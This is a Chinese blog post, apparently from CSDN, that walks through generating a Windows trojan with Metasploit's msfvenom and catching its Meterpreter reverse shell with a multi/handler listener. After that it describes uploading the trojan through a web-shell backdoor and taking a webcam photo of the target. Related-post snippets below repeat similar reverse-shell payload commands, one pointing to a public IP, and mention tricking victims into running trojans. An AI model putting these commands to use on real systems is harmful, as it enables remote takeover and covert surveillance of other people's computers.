Metasploit(MSF)生成木马教程,一次windows入侵记录(教程)

已于 2024-07-19 08:27:14 修改
阅读量618 收藏
点赞数 10
CC 4.0 BY-SA版权
文章标签: windows 网络安全
于 2024-07-18 21:54:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_62860907/article/details/140533926

我也是初学这,进去之后都不知道该干嘛,提权什么的,一概不会

首先查看一下IP地址吧

第二部,生成木马,设置攻击机的IP地址以及接收shell的端口

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.130.228 LPORT=4444 -f exe -o ./5E.exe

第三步,开启msf控制台,设置payload,开启监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.130.228
set lport 4444
show options
exploit

第四步,打开靶机(我使用的是中国蚁剑,靶机中我上传了后门,上传了生成的木马5E.exe)

上线成功,拍张照片看看

完毕

馡廊遗梦
关注
使用Metasploit生成木马控制Windows系统
weixin_56956399的博客
04-12 2397
使用Metasploit生成木马控制Windows系统
Metasploit 生成木马
2201_75516783的博客
11-28 919
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploitmsfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2726
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
MSF 生成不同的木马 msfvenom 框架命令
最新发布
浩策盾悟
05-10 1万+
msfvenom是Metasploit框架中的一个工具,用于生成各种类型的Payload(有效载荷),如木马、后门等,主要用于测试系统安全性。它支持多种编码方式、文件格式和平台。针对Windows平台,msfvenom可以生成EXE、VBS、PowerShell、DLL、Python等格式的木马,并可通过编码避免检测。对于Linux平台,它支持生成ELF、Bash、Python、Perl等格式的木马。此外,msfvenom还支持跨平台Payload生成,如Python和Ruby脚本。其他实用技巧包括生成多平
Metasploit (MSF) 使用并生成木马payload
2301_79642494的博客
10-29 2533
show: 查看选项 //当进入模块可是使用show option查看模块需要的参数选项,使用show targets和show payloads可查看target和payload选项参数。若出现handler failed to bind to说明该端口已经被占用,此时要把靶机的木马文件删除并重启靶机(因为木马一旦运行就不会停止,一直占用端口),再从头开始建立木马。如果需要退出删除session会话可以使用session -k 会话号,同样使用-K可以删除全部session会话。
Metasploit木马生成教程,零基础入门到精通,收藏这篇就够了
logic1001的博客
11-07 910
上次我们聊到了通过目标系统漏洞来获取目标的权限,其实我们除了可以通过目标系统的漏洞来获取 meterpreter 之外,还可以直接通过木马获取。msfvenom 就是 MSF 中用来生成后门木马的模块,在目标机器上执行后门木马,然后在本地配置监听目标即可上线,攻击机即可获得 meterpreter。msfvenom 是 msfpayload 和 msfencode 的组合,将这两个工具集成在一个框架实例中。
Metasploit生成木马
clown_YZ的博客
02-15 554
Metasploit
kali 中使用msf生成远控木马入侵windows(简单易懂,小白轻松上手)
保持进步,保持少年感
01-31 1417
kali 中使用msf生成远控木马入侵windows
利用msf生成木马控制win7
XiaoYeZhu_1314的博客
09-08 840
指定要生成的Payload类型为Windows平台的Meterpreter反向TCP shell。在Kali Linux中使用Metasploitmsfvenom工具生成一个Windows平台的Meterpreter反向TCP shell载荷。在把back.exe拖拽到受害者的主机上(win7如果不能粘贴外来文件,就把虚拟机中的VMware Tools打开安装就行)设置要连接回的IP地址,即指定Meterpreter shell将连接的IP地址。指定生成的文件格式为可执行文件(exe)
MSF生成木马渗透WIN7
妖魔鬼怪快离开的博客
11-15 5612
生成木马 使用msf模块中的msfvenom模块,生成.exe木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP地址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe 启动msfconsole msfconsole 设置payload参数 //开启监听· use exploit/multi/handler //设置tcp监听 set payload windows/meterpreter/rev
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 6231
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
Metasploit(msf)木马生成
m0_58713554的博客
11-04 378
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击端ip LPORT=1234 -f exe > /root/新建文件的文件名.exe 2 ls 查看是否创建出了该文件 3 然后进入msfconsole进行监听 4 use exploit/multi/handler 进入监听模式 5 set PAYLOAD set LHOST攻击机ip set LPORT 配置参数 6 run 运行 7 把刚...
msfvenom
jsd2root的博客
11-02 578
1.msfvenom的基本用法: Options:     -p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: pa
Metasploit -- 木马生成原理和方法
Web安全工具库
05-07 2442
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。 ---- 网易云热评 一、生成方式:利用msf模块中的msfvenom模块 二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马...
网络安全MSF生成木马教程
一直被模仿,从未被超越
03-13 2240
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
metasploit生成木马获取windowns控制权(非免杀版)
奇葩
12-06 1089
转载连接:https://zhuanlan.zhihu.com/p/66785692 写在前面 本想介绍几种生成免杀木马的方法,但经过实验发现这几种方法已经失效,可以被360或者腾讯安全管家查杀。所以本文的木马不具备免杀功能。 准备环境: 入侵机器:kali linux (IP地址:192.168.96.128) 靶机:window server 2003 (IP地址:192.168.96.1...
msf上制作简单的windows exe木马
weixin_73942557的博客
10-25 1336
msf制作Windows可执行程序木马并利用。首先利用用组件msfvenom制作木马。然后将生成木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
(超实用教程)利用MSF制作exe程序木马
star010-的博客
02-01 374
k:保护模板程序的动作,注入的payload作为一个新的进程运行。-a:指定payload的目标架构,比如:x86 | x64。-c:指定一个附加的win32 shellcode文件。-n:为payload预先指定一个NOP滑动长度。:remote host(远程主机)【被攻击机】-s:设定payload的最大长度(文件大小):local host(本地主机)【攻击机】-x:指定一个自定义的可执行文件作为模板。-p:指定需要使用的payload。-o:保存payload文件输出。-b:使用规避字符集。
msf生成木马
热门推荐
liu_jia_liang的博客
03-29 1万+
Linux   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
怎么用正则表达式匹配到msf生成的反弹木马
09-12
针对Metasploitmsf生成的反弹木马,可以通过查找特定的字符串或模式来尝试匹配。 Metasploit生成的反弹木马通常包含了一些特定的字符串模式,例如特定的端口、协议、或者是msf的标识字符串。一个简单的正则...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值